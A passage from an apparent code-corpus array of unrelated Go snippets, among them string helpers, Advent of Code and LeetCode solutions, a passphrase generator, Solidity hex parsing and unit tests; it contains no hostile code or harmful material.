\"\r\n\t\tret += keys[2].En_name\r\n\t\tret += \");\"\r\n\t\tbreak\r\n\r\n\t// 4个主键\r\n\tcase 4:\r\n\t\tret = \"uint64 key = keytool::Get16161616Key(\"\r\n\t\tret += keys[0].En_name\r\n\t\tret += \", \"\r\n\t\tret += keys[1].En_name\r\n\t\tret += \", \"\r\n\t\tret += keys[2].En_name\r\n\t\tret += \", \"\r\n\t\tret += keys[3].En_name\r\n\t\tret += \");\"\r\n\r\n\t\tbreak\r\n\t}\r\n\r\n\treturn ret\r\n}", "func parseLine(l string) string {\n\tvar lineParsed string\n\ta := 64 - len(l)\n\tif a != 0 {\n\t\tlineParsed = \"0\" + l\n\t\tfor k := 1; k < a; k++ {\n\t\t\tlineParsed = \"0\" + lineParsed\n\t\t}\n\t} else {\n\t\tlineParsed = l\n\t}\n\treturn lineParsed\n}", "func main() {\n\tsc.Split(bufio.ScanWords)\n\tn, k := readInt(), readInt()\n\tfmt.Println(run(n, k))\n}", "func numDecodings(message string) int {\n\tif len(message) == 0 {\n\t\treturn 0\n\t}\n\n\tif len(message) == 1 && message == \"0\" {\n\t\treturn 0\n\t}\n\n\tif len(message) == 1 && message != \"0\" {\n\t\treturn 1\n\t}\n\n\t// take the first digit\n\tfirstDigit := message[0:1]\n\twordFormed := 0\n\tif firstDigit != \"0\" {\n\t\twordFormed = wordFormed + numDecodings(message[1:])\n\t}\n\n\tif len(message) == 2 {\n\t\tfirstTwoDigits := message[0:2]\n\t\tintValue, err := strconv.Atoi(firstTwoDigits)\n\t\tif err != nil {\n\t\t\tpanic(\"Not possible\")\n\t\t}\n\t\tif intValue > 9 && intValue < 27 {\n\t\t\twordFormed = wordFormed + 1\n\t\t}\n\t}\n\n\tif len(message) >= 2 {\n\t\tfirstTwoDigits := message[0:2]\n\t\tintValue, err := strconv.Atoi(firstTwoDigits)\n\t\tif err != nil {\n\t\t\tpanic(\"Not possible\")\n\t\t}\n\t\tif intValue > 9 && intValue < 27 {\n\t\t\twordFormed = wordFormed + numDecodings(message[2:])\n\t\t}\n\t}\n\treturn wordFormed\n}", "func countAndSay(n int) string {\n\tif n == 1 { // special case\n\t\treturn \"1\"\n\t}\n\tpre, cur := \"\", \"1\"\n\thead, tail := 0, 0\n\n\ttmp := cur[0]\n\tlength := len(cur)\n\n\tfor i := 1; i < n; i++ { // 1 -> n -1\n\t\tlength = len(cur) // reset length\n\t\ttmp = cur[0] // reset tmp\n\t\thead = 0 // reset head and tail 0 0\n\t\tfor tail = 0; tail < length; tail++ {\n\t\t\tif cur[tail] == tmp { // find same as cache\n\t\t\t\thead++\n\t\t\t} else { // not found add tmp and cache pre then mark head -> 1\n\t\t\t\tpre = pre + strconv.Itoa(head) + string(tmp)\n\t\t\t\ttmp = cur[tail]\n\t\t\t\thead = 1\n\t\t\t}\n\n\t\t\tif tail == length-1 { // special case length-1 cache pre\n\t\t\t\tpre = pre + strconv.Itoa(head) + string(tmp)\n\t\t\t}\n\t\t}\n\t\tcur = pre // cur now\n\t\tpre = \"\" //reset\n\t}\n\treturn cur\n}", "func main() {\n\tsamples := []string{\"hello\", \"apple_π!\"}\nouter:\n\tfor _, sample := range samples {\n\t\tfor i, r := range sample {\n\t\t\tfmt.Println(i, r, string(r))\n\t\t\tif r == 'l' {\n\t\t\t\tcontinue outer\n\t\t\t}\n\t\t}\n\t\tfmt.Println()\n\t}\n}", "func foldString(maxLength int, prefix, s string) string {\n\tvar foldedBuffer bytes.Buffer\n\tlineBuffer := bytes.NewBufferString(prefix)\n\tlineLength := lineBuffer.Len()\n\n\tfor _, word := range strings.Split(s, \" \") {\n\t\twordLength := len(word)\n\t\tif wordLength+lineLength+1 <= maxLength {\n\t\t\tlineBuffer.WriteString(word)\n\t\t\tlineBuffer.WriteString(\" \")\n\t\t\tlineLength += wordLength + 1\n\t\t} else {\n\t\t\tfoldedBuffer.Write(lineBuffer.Bytes())\n\t\t\tfoldedBuffer.WriteString(\"\\r\\n \")\n\t\t\tlineBuffer.Reset()\n\t\t\tlineBuffer.WriteString(word)\n\t\t\tlineBuffer.WriteString(\" \")\n\t\t\tlineLength = wordLength + 1\n\t\t}\n\t}\n\tfoldedBuffer.Write(lineBuffer.Bytes())\n\tfoldedBuffer.WriteString(\"\\r\\n\")\n\treturn foldedBuffer.String()\n}", "func main() {\n\tvar name string\n\tfriends := make([]string, 3)\n\n\tfor i := 0; name != \"q\"; i++ {\n\t\tfmt.Print(\"Digite o nome de um amigo e digite 'q' para parar: \")\n\t\tfmt.Scanf(\"%s\", &name)\n\t\tif name != \"q\" {\n\t\t\tif i < 3 {\n\t\t\t\tfriends[i] = name\n\t\t\t} else {\n\t\t\t\t// friends = append(friends, name, \"João\", \"Maria\", \"Mario\")\n\t\t\t\tfriends = append(friends, name)\n\t\t\t}\n\t\t}\n\t}\n\n\tfmt.Printf(\"\\nVocê tem %v amigo(s) \\n\", len(friends))\n\tfor _, friend := range friends {\n\t\tfmt.Printf(\"— %s \\n\", friend)\n\t}\n\n\t// other_type_slice := friends[:3] // Quando nenhum valor é colocado antes do ':' quer dizer que é sempre 0\n\n\tother_type_slice := friends[1:3]\n\tfmt.Println(other_type_slice)\n}", "func main() {\n\ts := fmt.Sprintf(\"%v %v %v\\n\", x, y, z)\n\n\tfmt.Println(s)\n}", "func main() {\n\tfmt.Println(phrase)\n}", "func boring1(msg string, ch chan string) {\n\tfor i := 0; ; i++ {\n\t\tch <- fmt.Sprintf(\"%v say: %d\", msg, i)\n\t}\n}", "func Strings(b0, b1 string) int {\n\treturn Runes(runes(b0), runes(b1))\n}", "func encDecString(strs string) (int, string, string) {\r\n\teFlag := 0\r\n\r\n\tif len(strs) > 5 { //40: ( 41: )\r\n\t\tif strs[0] == 40 && strs[len(strs)-1] == 41 {\r\n\t\t\teFlag = 1\r\n\t\t} else if strs[0] == 41 && strs[len(strs)-1] == 40 {\r\n\t\t\teFlag = 2\r\n\t\t} else {\r\n\t\t\treturn eFlag, \"\", \"\"\r\n\t\t}\r\n\r\n\t\tif strings.Index(strs, \":\") != -1 {\r\n\t\t\tout := strings.Split(strs, \":\")\r\n\t\t\treturn eFlag, out[0][1:], out[1][:len(out[1])-1]\r\n\t\t} else {\r\n\t\t\teFlag = 0\r\n\t\t}\r\n\t}\r\n\treturn eFlag, \"\", \"\"\r\n}", "func f(from string){\n for i:=0;i<3;i++{\n fmt.Println(from,\":\",i)\n }\n}", "func appendDelimited(out *bytes.Buffer, m proto.Message) (int, error) {\n\tbuf, err := proto.Marshal(m)\n\tif err != nil {\n\t\treturn 0, err\n\t}\n\n\tvar delim [binary.MaxVarintLen32]byte\n\tlen := binary.PutUvarint(delim[:], uint64(len(buf)))\n\tn, err := out.Write(delim[:len])\n\tif err != nil {\n\t\treturn n, err\n\t}\n\n\tdn, err := out.Write(buf)\n\treturn n + dn, err\n}", "func creaParole() string {\n\tvar r rune\n\tvar lenStringGenerata string\n\trand.Seed(time.Now().UnixNano())\n\t\n\tfor i := 0; i < lenString; i++ {\n\t\tr = rune(rand.Intn(26) + 97)\n\t\tlenStringGenerata += string(r)\n\t}\n\treturn lenStringGenerata\n}", "func TestID_String_Parse_Many(t *testing.T) {\n\tr := rand.New(rand.NewSource(0))\n\n\tfor i := 0; i < 1_000_000; i++ {\n\t\tid := ID{High: r.Uint64(), Low: r.Uint64()}\n\n\t\t// Sometimes generate a number that's just a uint64.\n\t\tif r.Int()%7 == 0 {\n\t\t\tid.High = 0\n\t\t}\n\n\t\tparsed, err := Parse(id.String())\n\t\trequire.NoError(t, err)\n\t\trequire.Equal(t, id, parsed)\n\t}\n}", "func main() {\n\t// testString := \"A2C蔡x聪1二C45六\"\n\ttestString := \"15225\"\n\tfmt.Println(comma(testString))\n}", "func getWord(id int64) string {\n\treturn diceware8k[id&8191]\n}", "func elide(inBuf bytes.Buffer) string {\n\ttempBuf := elideToLen(inBuf, 80)\n\treturn tempBuf.String()\n}", "func PartTwo(input string) (string, error) {\n\tfor _, line := range strings.Split(input, \"\\n\") {\n\n\t\troom := roomData(line)\n\n\t\tif room.decryptRoomName() == \"northpole object storage \" {\n\t\t\treturn strconv.Itoa(room.getSectorID()), nil\n\t\t}\n\n\t}\n\n\treturn \"\", errors.New(\"Could not find room\")\n}", "func algorithm1() {\n\ts := \"fooBarBaz GNU PYTHON Standard\"\n\tvar parts []string\n\tstart, lastCap := 0, 0\n\tfor end, r := range s {\n\t\tif end != 0 && unicode.IsUpper(r) {\n\t\t\t//fmt.Printf(\"%d, %d\\n\",lastCap, end)\n\t\t\tif end != lastCap+1 {\n\t\t\t\tparts = append(parts, s[start:end])\n\t\t\t\tstart = end\n\t\t\t}\n\t\t\tlastCap = end\n\t\t}\n\t}\n\tif start != len(s) {\n\t\tparts = append(parts, s[start:])\n\t}\n\tfmt.Printf(\"%q\\n\", parts)\n}", "func run(input string) (interface{}, interface{}) {\n\thexaPositions := parse(input)\n\n\t// part 1\n\tm := twod.Map{}\n\tfor _, p := range hexaPositions {\n\t\tflip(m, p)\n\t}\n\tpart1 := len(m)\n\n\t// part 2\n\tfor i := 0; i < 100; i++ {\n\t\tblackCounts := make(twod.Map)\n\t\tfor pos := range m {\n\t\t\tfor _, dir := range hexaDirs {\n\t\t\t\t_, exist := blackCounts[pos+dir]\n\t\t\t\tif !exist {\n\t\t\t\t\tblackCounts[pos+dir] = 0\n\t\t\t\t}\n\t\t\t\tblackCounts[pos+dir] = blackCounts[pos+dir].(int) + 1\n\t\t\t}\n\t\t}\n\t\tnewM := make(twod.Map)\n\t\tfor pos := range m {\n\t\t\tcount, exist := blackCounts[pos]\n\t\t\tif !exist || count.(int) > 2 {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tnewM[pos] = '#'\n\t\t}\n\t\tfor pos, count := range blackCounts {\n\t\t\t_, exist := m[pos]\n\t\t\tif !exist && count == 2 {\n\t\t\t\tnewM[pos] = '#'\n\t\t\t}\n\t\t}\n\t\tm = newM\n\t}\n\tpart2 := len(m)\n\n\treturn part1, part2\n}", "func (mt *MTService) Hello(args map[string]string) string {\n\tb := mc.NewBytesBuffer(1000)\n\tx := b.Bytes()\n\tb.WriteZigzag64(64)\n\tb.WriteZigzag64(1)\n\tb.WriteZigzag32(64)\n\tb.WriteZigzag32(1)\n\tf := b.Bytes()\n\treturn fmt.Sprintf(\"%+v-------%+v\", x, f)\n}", "func shift_left_once(key_chunk string) string {\n\tshifted := \"\"\n\tfor i := 1; i < 28; i++ {\n\t\tshifted += string(key_chunk[i])\n\t}\n\tshifted += string(key_chunk[0])\n\treturn shifted\n}", "func printBig(input string) {\n\tconst chunkSize = 2000\n\tchunks := len(input) / chunkSize\n\tfor index := 0; index < chunks; index++ {\n\t\tprintWrapper(input[index*chunkSize : (index+1)*chunkSize])\n\t}\n\tprintWrapper(input[chunks*chunkSize : (chunks*chunkSize)+(len(input)%chunkSize)])\n}", "func wordsToUuid(words ...string) string {\n\tif len(words) == 0 {\n\t\treturn \"00000000-0000-0000-0000-000000000000\"\n\t}\n\n\th := md5.New()\n\tfor _, w := range words {\n\t\th.Write([]byte(w))\n\t}\n\n\tu := h.Sum(nil)\n\tu[8] = 0x80 | (u[8] & 0x3F) // octet8 10XX XXXX = RFC4412 variant\n\tu[6] = 0x30 | (u[6] & 0x0F) // octet6 0011 XXXX = MD5 based uuid\n\treturn fmt.Sprintf(\"%x-%x-%x-%x-%x\", u[0:4], u[4:6], u[6:8], u[8:10], u[10:16])\n}", "func printToken(s string, max int, buf *bytes.Buffer) {\n\tbuf.WriteString(s)\n\tif l := len(s); l < max {\n\t\tbuf.WriteString(strings.Repeat(\" \", max-l))\n\t}\n}", "func parseNextValueFromSolidityHexStr(partialData, typeString, dataLeft string, chunkLeft, stringCount int) (interface{}, int, error) {\n\tswitch typeString {\n\tcase \"uint8\":\n\t\ttheInt, err := strconv.ParseUint(partialData, 10, 8)\n\t\tif err != nil {\n\t\t\treturn nil, stringCount, err\n\t\t}\n\t\treturn uint8(theInt), stringCount, nil\n\n\tcase \"uint32\":\n\t\ttheInt, err := strconv.ParseUint(partialData, 10, 32)\n\t\tif err != nil {\n\t\t\treturn nil, stringCount, err\n\t\t}\n\t\treturn uint32(theInt), stringCount, nil\n\n\tcase \"uint256\":\n\t\ti := new(big.Int)\n\t\ttheInt, ok := i.SetString(partialData, 16)\n\t\tif !ok {\n\t\t\treturn nil, stringCount, errors.New(fmt.Sprintf(\"Error parsing big.Int from %s\", partialData))\n\t\t}\n\t\treturn theInt, stringCount, nil\n\n\tcase \"address\":\n\t\tsliced := \"0x\" + partialData[24:]\n\t\tstrings.ToLower(sliced)\n\t\treturn sliced, stringCount, nil\n\n\tcase \"string\":\n\t\t// find len of string\n\t\t// chunkLeft*64 : have to skip all chunk left\n\t\t// stringCount*64*2 : have to skip all string chunk passed\n\n\t\tdataChunkIndex := chunkLeft*64 + stringCount*64*2\n\t\tlenChunk := dataLeft[dataChunkIndex : dataChunkIndex+64]\n\n\t\t// find chunk of string\n\t\t// +64 for skip len chunk\n\t\tstringChunk := dataLeft[dataChunkIndex+64 : dataChunkIndex+64*2]\n\n\t\t//decode string\n\t\tbyteString, err := hex.DecodeString(stringChunk)\n\t\tif err != nil {\n\t\t\treturn nil, stringCount, err\n\t\t}\n\n\t\t//substring equal to len\n\t\ti := new(big.Int)\n\t\tstringLen, ok := i.SetString(lenChunk, 16)\n\t\tif !ok {\n\t\t\treturn nil, stringCount, errors.New(fmt.Sprintf(\"Error parsing big.Int from %s\", partialData))\n\t\t}\n\t\tbyteString = byteString[:stringLen.Int64()]\n\t\tstringConverted := string(byteString)\n\n\t\treturn strings.ToLower(stringConverted), stringCount + 1, nil\n\t}\n\treturn typeString, stringCount, nil\n}", "func main() {\n\ts := bufio.NewScanner(os.Stdin)\n\tn := 0\n\tm := 0\n\tfor s.Scan() {\n\t\tfields := strings.Fields(s.Text())\n\t\tbounds := strings.SplitN(fields[0], \"-\", 2)\n\t\tminCt, _ := strconv.Atoi(bounds[0])\n\t\tmaxCt, _ := strconv.Atoi(bounds[1])\n\t\tchr := strings.TrimSuffix(fields[1], \":\")\n\t\tpass := fields[2]\n\n\t\tct := strings.Count(pass, chr)\n\t\tif ct >= minCt && ct <= maxCt {\n\t\t\tfmt.Println(s.Text())\n\t\t\tn++\n\t\t}\n\n\t\t// fmt.Println(minCt, maxCt, chr)\n\t\t// fmt.Println(pass)\n\t\t// for i := 0; i < (minCt - 1); i++ {\n\t\t// \tfmt.Print(\" \")\n\t\t// }\n\t\t// fmt.Print(chr)\n\t\t// for i := 0; i < (maxCt - minCt); i++ {\n\t\t// \tfmt.Print(\" \")\n\t\t// }\n\t\t// fmt.Println(chr)\n\t\tmatches := 0\n\t\tif pass[minCt-1] == chr[0] {\n\t\t\tmatches++\n\t\t}\n\t\tif pass[maxCt-1] == chr[0] {\n\t\t\tmatches++\n\t\t}\n\t\tm += matches % 2\n\t}\n\tfmt.Println(n, m)\n}", "func main() {\n\tfile,err := os.Open(\"RolanEngine/shader/Unlit.shader\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tdefer file.Close()\n\n\t//// 使用ioutil读取文件所有内容\n\tb, err := ioutil.ReadAll(file)\n\t//fmt.Print(string(b))\n\ttracer := string(b)\n\t//comma的意思是从字符串tracer查找第一个 #ifdef FRAGMENT,然后返回他的位置,这里的每个中文是占3个字符,从0开始计算,那么#ifdef FRAGMENT的位置就是12\n\tcomma := strings.Index(tracer, \"#ifdef FRAGMENT\")\n\t//pos := strings.Index(string(b)[comma:], \"#ifdef FRAGMENT\")\n\tfmt.Println(tracer[comma:] + \" + \\\"\\x00\\\"\")\n\n\t//tracer[comma:]这个是的意思截取字符串tracer,从12开始,包括12\n}", "func randomData(strLen int) []byte {\n\tran := 'z' - '0'\n\ttext := make([]byte, strLen)\n\tfor i := range text {\n\t\tchar := rand.Int()\n\t\tchar %= int(ran)\n\t\tchar += '0'\n\t\ttext[i] = byte(char)\n\t}\n\treturn text\n}", "func main() {\n\tvar oi string\n\tfor i := 0; i < 10; i++ {\n\t\toi += strconv.Itoa(i + 1)\n\t\tfmt.Printf(\"%d\\n\", oi)\n\t}\n\n}", "func name(n int) string {\n\t// This function returns some random names\n\tchars := \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.\"\n\tname := make([]byte, n) // Making Slices\n\tfor i := range name {\n\t\tname[i] = chars[rand.Intn(len(chars))]\n\t}\n\n\tfmt.Println(string(name))\n\treturn string(name) // Stringify the output and return\n}", "func slur(p string, d int) string {\n\t// shuffle only interior letters\n\ta := []byte(p[1 : len(p)-1])\n\t// adapted from Knuth shuffle task.\n\t// shuffle letters with probability d/100.\n\tfor i := len(a) - 1; i >= 1; i-- {\n\t\tif rand.Intn(100) >= d {\n\t\t\tj := rand.Intn(i + 1)\n\t\t\ta[i], a[j] = a[j], a[i]\n\t\t}\n\t}\n\t// condense spaces\n\tw := strings.Fields(p[:1] + string(a) + p[len(p)-1:])\n\treturn strings.Join(w, \" \")\n}", "func createContextID(n int) string {\n\tb := make([]rune, n)\n\tfor i := range b {\n\t\tb[i] = letterRunes[rand.Intn(len(letterRunes))]\n\t}\n\treturn string(b)\n}", "func main() {\r\n\ttest := \"abcdefghijklmnopqrstuvwxyz\"\r\n\r\n\tsymFreqs := make(map[rune]int)\r\n\t// read each symbol and record the frequencies\r\n\tfor _, c := range test {\r\n\t\tsymFreqs[c]++\r\n\t}\r\n\r\n\t// example tree\r\n\texampleTree := buildTree(symFreqs)\r\n\r\n\t// print out results\r\n\tfmt.Println(\"SYMBOL\\tWEIGHT\\tHUFFMAN CODE\")\r\n\tprintCodes(exampleTree, []byte{})\r\n}", "func NomePezzo(p Pezzo)string{\n re := 0x2654 //valore unicode hex\n t := \"\"\n if p.tipo >= RE && p.tipo <= PEDONE{ // RE=1,...,PEDONE=6 type byte\n if p.colore == NERO{\n re += 6\n }\n t = string(re - 1 + int(p.tipo))\n \n }\n\n return t\n}", "func juggle(s string, n int) string {\n\tn = n % len(s)\n\tif n == 0 {\n\t\treturn s\n\t}\n\tbuf := make([]byte, len(s))\n\tcopy(buf, s)\n\tfor i := 0; i < n; i++ {\n\t\tvar (\n\t\t\ttmp byte\n\t\t\tj int\n\t\t)\n\t\ttmp = buf[i]\n\t\tfor j = i; j < len(buf)-n; j += n {\n\t\t\tbuf[j] = buf[j+n]\n\t\t}\n\t\tif i != 0 {\n\t\t\tbuf[j] = buf[len(buf)-1]\n\t\t}\n\t\tbuf[len(buf)-1] = tmp\n\t}\n\treturn string(buf)\n}", "func printHeader(num int) {\n\ts := fmt.Sprint(num)\n\tfmt.Print(s)\n\tfor i := 0; i < 8-len(s); i++ {\n\t\tfmt.Print(\" \")\n\t}\n}", "func Say(n int64) (string, bool) {\n\tchunks, ok := breakUp(n)\n\tif !ok {\n\t\treturn \"\", false\n\t}\n\tif n == 0 {\n\t\treturn \"zero\", true\n\t}\n\tenglish := \"\"\n\tfor i, chunk := range chunks {\n\t\tif chunk != 0 {\n\t\t\tif len(english) != 0 {\n\t\t\t\tenglish += \" \"\n\t\t\t}\n\t\t\tenglish += under999(chunk)\n\t\t\tif len(scale[len(scale)-i-1]) != 0 {\n\t\t\t\tenglish += \" \" + scale[len(scale)-i-1]\n\t\t\t}\n\t\t}\n\t}\n\treturn english, true\n}", "func buildPhrases(words []string, ppWords int) {\n dictLength := big.NewInt(int64(len(words)))\n password := \"\"\n for i := 0; i < ppWords; i++ {\n index, err := rand.Int(rand.Reader, dictLength)\n if err != nil {\n fmt.Println(\"Something strange happened\")\n return\n }\n word := []byte(words[index.Uint64()])\n password += ucFirst(toUtf8(word))\n }\n fmt.Printf(\": %-60s - Brute force giving a total of %.1f bit entropy.\\n\", password, math.Log2(float64(58))*float64(len(password)))\n}", "func ladderLength(beginWord string, endWord string, wordList []string) int {\n\tdict := make(map[string]bool) // 把word存入字典\n\tfor _, word := range wordList {\n\t\tdict[word] = true // 可以利用字典快速添加、删除和查找单词\n\t}\n\tif _, ok := dict[endWord]; !ok {\n\t\treturn 0\n\t}\n\t// queue := []string{beginWord} 定义辅助队列\n\tvar queue []string\n\tqueue = append(queue, beginWord)\n\n\tl := len(beginWord)\n\tsteps := 0\n\n\tfor len(queue) > 0 {\n\t\tsteps++\n\t\tsize := len(queue)\n\t\tfor i := size; i > 0; i-- { // 当前层级节点\n\t\t\ts := queue[0] // 原始单词\n\t\t\tqueue = queue[1:]\n\t\t\tchs := []rune(s)\n\t\t\tfor i := 0; i < l; i++ { // 对单词的每一位进行修改\n\t\t\t\tch := chs[i] // 对当前单词的一位\n\t\t\t\tfor c := 'a'; c <= 'z'; c++ { // 尝试从a-z\n\t\t\t\t\tif c == ch { // 跳过本身比如hot修改为hot\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\tchs[i] = c\n\t\t\t\t\tt := string(chs)\n\t\t\t\t\tif t == endWord { // 找到结果\n\t\t\t\t\t\treturn steps + 1\n\t\t\t\t\t}\n\t\t\t\t\tif _, ok := dict[t]; !ok { // 不在dict中,跳过\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\tdelete(dict, t) // 从字典中删除该单词,因为已经访问过,若重复访问路径一定不是最短的\n\t\t\t\t\tqueue = append(queue, t) // 将新的单词添加到队列\n\t\t\t\t}\n\t\t\t\tchs[i] = ch // 单词的第i位复位,再进行下面的操作\n\t\t\t}\n\t\t}\n\t}\n\treturn 0\n}", "func main() {\n\ts := []int{2, 3, 5, 7, 11, 13}\n\tprintSlice(s)\n\n\tb := s[:0]\n\tprintSlice(b)\n\n\tc := s[:4]\n\tprintSlice(c)\n\n\td := s[2:]\n\tprintSlice(d)\n}", "func Word() string{\n\tword := make([]uint8, rand.Intn(100) + 1) //Generate the character base array\n\tfor i := 0; i < len(word); i++ {\n\t\tword[i] = Char()//Generate every character\n\t}\n\treturn string(word)\n}", "func read(input <-chan byte, delim byte) string {\n\ttoken := make([]byte,0)\n\tfor msgByte := range input {\n\t\tif(msgByte==delim) {\n\t\t\tbreak\n\t\t}\n\t\ttoken = append(token,msgByte)\n\t}\n\ttoken = bytes.Trim(token,\"\\x00\")\n\treturn string(token)\n}", "func TestGetfields5(t *testing.T) {\n\tinputSlice := []byte{140, 1, 149, 217, 1, 168, 26, 0, 153, 218, 74, 59, 146, 44, 31, 47, 163, 0, 92, 44, 123, 160, 210, 22, 6, 84, 3, 62}\n\t//inputSlice := []byte{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}\n\toffset := 142\n\twidth := 55\n\tbytesWidth := gobitfields.GetBytesSize(width)\n\n\tout := gobitfields.GetField(inputSlice,offset,width)\n\n\tif len(out) != bytesWidth {\n\t\tt.Error(\"Bad size\")\n\t}\n\n\ttmpField := make([]byte, 8)\n\tfor i, _ := range tmpField {\n\t\ttmpField[i ] = 0\n\t}\n\tfor i , val := range out {\n\t\ttmpField[i] = val\n\t}\n\n\taword := binary.LittleEndian.Uint64(tmpField)\n\n\tputTmpField := make([]byte,8)\n\n\tbinary.LittleEndian.PutUint64(putTmpField,6855775006536048)\n\n\tt.Log(\"input slice: \", inputSlice)\n\tt.Log(\"result: \", out)\n\tt.Log(\"aWord: \", aword)\n\tt.Log(\"gold:\", putTmpField)\n\n\tfor i , aByte := range out {\n\t\tif putTmpField[i] != aByte {\n\t\t\tt.Error(\"mismatch: \", i, aByte, putTmpField[i])\n\t\t}\n\t}\n\n\t//[12 168 204 14 64 213 0 200 212 0]\n}", "func id_lookup(\nid[]rune,/* string with id */\nt int32/* the ilk; used by \\.{GOWEAVE} only */)int32{\n\n\n/*46:*/\n\n\n//line gocommon.w:644\n\nh:=id[0]\nfor i:=1;i<len(id);i++{\nh= (h+h+id[i])%hash_size\n}\n\n\n\n/*:46*/\n\n\n//line gocommon.w:632\n\n\n\n/*47:*/\n\n\n//line gocommon.w:653\n\np:=hash[h]\nfor p!=-1&&!names_match(p,id,t){\np= name_dir[p].llink\n}\nif p==-1{\np:=int32(len(name_dir))/* the current identifier is new */\nname_dir= append(name_dir,name_info{})\nname_dir[p].llink= -1\ninit_node(p)\nname_dir[p].llink= hash[h]\nhash[h]= p/* insert p at beginning of hash list */\n}\n\n\n\n/*:47*/\n\n\n//line gocommon.w:633\n\nif p==-1{\n\n\n/*49:*/\n\n\n//line gocommon.w:671\n\np= int32(len(name_dir)-1)\nname_dir[p].name= append(name_dir[p].name,id...)\n\n\n/*97:*/\n\n\n//line gotangle.w:146\n\n\n\n\n\n/*:97*/\n\n\n//line gocommon.w:674\n\n\n\n\n/*:49*/\n\n\n//line gocommon.w:635\n\n}\nreturn p\n}", "func (*String) NKeys() int { return 2 }", "func playground() {\n\ts := \"Grüezi\"\n\tfmt.Println(s)\n\tfor i, r := range s {\n\t\tfmt.Printf(\"%d %s \", i, string(r))\n\t}\n\tfmt.Println()\n\tfmt.Println(string(65))\n}", "func int32InsertComma(val uint) string {\n\ts := strconv.Itoa(int(val))\n\tn := 3\n var buffer bytes.Buffer\n for i, rune := range s {\n \tif i != 0 && (len(s)-i) % n == 0 {\n \t\tbuffer.WriteRune(',')\t\n \t} \n buffer.WriteRune(rune)\n }\n\n return buffer.String()\n}", "func (q *QQwry) readString(offset uint32) []byte {\n\tq.setOffset(int64(offset))\n\tdata := make([]byte, 0, 30)\n\tbuf := make([]byte, 1)\n\tfor {\n\t\tbuf = q.readData(1)\n\t\tif buf[0] == 0 {\n\t\t\tbreak\n\t\t}\n\t\tdata = append(data, buf[0])\n\t}\n\treturn data\n}", "func main() {\n\n\tscanner := bufio.NewScanner(os.Stdin)\n\tvar lines []string\n\n\tfor scanner.Scan() {\n\t\tif len(scanner.Text()) == 0 {\n\t\t\tbreak\n\t\t}\n\t\tlines = append(lines, scanner.Text())\n\n\t}\n\n\tn, _ := strconv.Atoi(lines[0])\n\n\tline := strings.Split(lines[1], \" \")\n\n\tfor x := n - 1; x >= 0; x-- {\n\n\t\tfmt.Print(line[x] + \" \")\n\n\t}\n\n}", "func PartTwo(r io.Reader, w io.Writer) error {\n\tmotions, err := motionsFromReader(r)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"could not read input: %w\", err)\n\t}\n\n\tcount := countUniqueTailPositions(motions, 10)\n\n\t_, err = fmt.Fprintf(w, \"%d\", count)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"could not write answer: %w\", err)\n\t}\n\n\treturn nil\n}", "func main() {\n\tvar input = \"1.345.679\"\n\treg, err := regexp.Compile(`[^a-zA-Z0-9]+`)\n\tif err != nil {\n\t\tfmt.Println(\"something went wrong with the input\")\n\t\tos.Exit(2)\n\t}\n\n\tdata := reg.ReplaceAllString(input, \"\")\n\tlength := len(data)\n\tzero := \"0\"\n\n\tfor i := 0; i < len(data); i++ {\n\t\tlength--\n\t\tif length == 1 {\n\t\t\tzero = \"\"\n\t\t}\n\t\tfmt.Printf(\"%s%0*s\\n\", string(data[i]), length, zero)\n\t}\n}", "func TestAddWordNL(t *testing.T) {\n\tf := New(nil, nil)\n\tf.AddWord(`: nop ;`)\n\tf.AddWord(`: bar \nnop \n;`)\n\tgood := []uint16{}\n\tfor _, v := range []string{\"CALL\", \":\", \"nop\", \";\"} {\n\t\taa, _ := f.Addr(v)\n\t\tgood = append(good, aa)\n\t}\n\tgood[0] = 2\n\tstart, _ := f.Addr(\"bar\")\n\tcmp := []uint16{f.WordPtr(start), f.WordPtr(start + 2), f.WordPtr(start + 4), f.WordPtr(start + 6)}\n\tif !Uint16sEqual(cmp, good) {\n\t\tt.Fatal(\"code of nop wasn't\", good, \"but was\", cmp)\n\t}\n}", "func body(s string) string {\t\n\tn := len(s)\n\tif n <= 3 {\n\t\treturn s\n\t}\n\treturn body(s[:n-3]) + \",\" + s[n-3:]\n}", "func packetLine(l string) (string, error) {\n\th := strconv.FormatInt(int64(len(l)+4), 16)\n\tif len(h) > 4 {\n\t\treturn \"\", errors.New(\"packet too long\")\n\t}\n\treturn strings.Repeat(\"0\", 4-len(h)) + h + l, nil\n}", "func Gen(c byte) (s string, err error) {\n\t// fmt.Println(string(c))\n\tn := bytes.ToUpper([]byte{c})\n\tif c < 'A' || c > 'Z' {\n\t\terr = fmt.Errorf(\"input out of range\")\n\t\treturn\n\t}\n\tl := n[0] - byte('A')\n\tdiamond := make([][]byte, int(l)*2+2)\n\tb := make([]string, 0)\n\tp1 := int(l)\n\tp2 := p1\n\t// fmt.Println(l)\n\ta := make([]byte, int(l)+1)\n\tfor x := 0; x <= int(l); x++ {\n\t\ta[x] = byte(65 + x)\n\t}\n\t// fmt.Println(string(a))\n\tletter := 0\n\tout := true\n\tfor x := 0; x <= int(l)*2; x++ {\n\t\tdiamond[x] = make([]byte, int(l)*2+2)\n\t\tfor y := 0; y <= int(l)*2; y++ {\n\t\t\tdiamond[x][y] = ' '\n\t\t\tif y == p1 {\n\t\t\t\tdiamond[x][y] = a[letter]\n\t\t\t}\n\t\t\tif y == p2 {\n\t\t\t\tdiamond[x][y] = a[letter]\n\t\t\t}\n\t\t}\n\t\t// fmt.Println(string(diamond[x]))\n\t\tif out {\n\t\t\tletter++\n\t\t\tp1--\n\t\t\tp2++\n\t\t} else {\n\t\t\tletter--\n\t\t\tp1++\n\t\t\tp2--\n\t\t}\n\n\t\tif p1 == -1 {\n\t\t\tout = false\n\t\t\tp1 = 1\n\t\t\tp2 -= 2\n\t\t\tletter -= 2\n\t\t}\n\t}\n\tfor x := range diamond {\n\t\tif len(diamond[x]) > 0 {\n\t\t\tb = append(b, string(diamond[x]))\n\t\t}\n\t}\n\ts = 